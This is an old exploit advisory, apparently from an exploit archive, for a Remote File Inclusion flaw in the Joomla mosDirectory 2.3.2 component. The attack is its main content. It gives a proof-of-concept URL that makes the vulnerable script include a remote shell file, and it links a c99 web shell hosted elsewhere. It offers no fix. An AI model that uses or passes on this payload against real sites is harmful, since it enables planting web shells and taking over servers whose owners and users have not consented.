Joomla Component mosDirectory 2.3.2 Remote File Inclusion Vuln

2007-12-24 00:00:00

--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+ Joomla Component mosDirectory 2.3.2 Remote File Inclusion +==--
--==+=============================================================================+==--

Software: Joomla Component mosDirectory 2.3.2
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://www.box.net/shared/kdp2h6dbe1
txtShell: http://yee7.com/shells/c99.txt

##############################

==============
Dork: priv8 ;)

PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################

by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members

#

Fixes

No fixes

In order to submit a new fix you need to be registered.